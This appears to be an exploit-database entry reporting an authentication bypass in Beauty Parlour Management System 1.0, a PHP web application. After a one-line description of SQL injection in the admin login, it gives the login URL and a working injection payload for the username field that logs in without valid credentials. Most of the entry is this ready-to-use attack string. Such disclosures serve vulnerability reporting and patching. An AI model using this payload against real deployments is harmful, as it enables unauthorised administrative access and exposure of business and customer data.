id: 34582
date: 06/18/2020
title: Beauty Parlour Management System 1.0 - Authentication Bypass Vulnerability
author: Kailas PATIL
cves: 

# Exploit Title: Beauty Parlour Management System 1.0 - Authentication Bypass
# Exploit Author: Prof. Kailas PATIL  (krp)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/
# Version: v1.0
# Category: Webapps
# Tested on: LAMP for Linux

# Description:
# Password and username parameters have sql injection vulnerability in Admin login panel.
# 
#------------------------------------------------------
# 
# Login Link:  http://localhost/bpms/admin/index.php
# 	username: ' or '1'='1'#  
#	password: blah123
# 
#------------------------------------------------------

#  0day.today [2023-03-22]  #